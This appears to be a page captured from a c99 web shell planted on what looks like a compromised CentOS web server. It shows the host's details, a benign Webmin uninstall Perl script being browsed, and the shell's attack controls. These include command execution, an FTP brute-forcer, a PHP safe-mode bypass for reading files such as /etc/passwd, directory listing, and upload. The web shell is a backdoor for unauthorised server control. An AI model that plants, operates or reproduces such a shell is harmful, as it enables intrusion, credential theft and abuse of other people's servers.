!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/init/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     delboot.pl (2 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# delboot.pl
# Called by uninstall.sh to stop webmin being started at boot time

$no_acl_check++;
require './init-lib.pl';
$product = $config{'atboot_product'} || "webmin";
$ucproduct = ucfirst($product);

if ($init_mode eq "osx") {
    # Remove from hostconfig file
    open(LOCAL, $config{'hostconfig'});
    @local = <LOCAL>;
    close(LOCAL);
    $start = "WEBMIN=-";
    &open_tempfile(LOCAL, ">$config{'hostconfig'}");
    &print_tempfile(LOCAL, grep { !/^$start/ } @local);
    &close_tempfile(LOCAL);
    print "Deleted from $config{'hostconfig'}\n";
    # get rid of the startup items
    $paramlist = "$config{'darwin_setup'}/$ucproduct/$config{'plist'}";
    $scriptfile = "$config{'darwin_setup'}/$ucproduct/$ucproduct";
    print "Deleting $config{'darwin_setup'}/$ucproduct ..";
    unlink ($paramlist);
    unlink ($scriptfile);
    print "\. ", rmdir ("$config{'darwin_setup'}/$ucproduct") ? "Success":"Failed", "\n";
    }
elsif ($init_mode eq "local") {
    # Remove from boot time rc script
    open(LOCAL, $config{'local_script'});
    @local = <LOCAL>;
    close(LOCAL);
    $start = "$config_directory/start";
    &open_tempfile(LOCAL, ">$config{'local_script'}");
    &print_tempfile(LOCAL, grep { !/^$start/ } @local);
    &close_tempfile(LOCAL);
    print "Deleted from bootup script $config{'local_script'}\n";
    }
elsif ($init_mode eq "init") {
    # Delete bootup action
    foreach (&action_levels('S', $product)) {
        /^(\S+)\s+(\S+)\s+(\S+)$/;
        &delete_rl_action($product, $1, 'S');
        }
    foreach (&action_levels('K', $product)) {
        /^(\S+)\s+(\S+)\s+(\S+)$/;
        &delete_rl_action($product, $1, 'K');
        }
    $fn = &action_filename($product);
    unlink($fn);
    print "Deleted init script $fn\n";
    }
elsif ($init_mode eq "win32") {
    # Delete win32 service
    &delete_win32_service($product);
    }
elsif ($init_mode eq "rc") {
    # Delete FreeBSD RC script
    &delete_rc_script($product);
    }
elsif ($init_mode eq "upstart") {
    # Delete upstart service
    &delete_upstart_service($product);
    }
elsif ($init_mode eq "systemd") {
    # Delete systemd service
    &delete_systemd_service($product.".service");
    }

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0081 ]--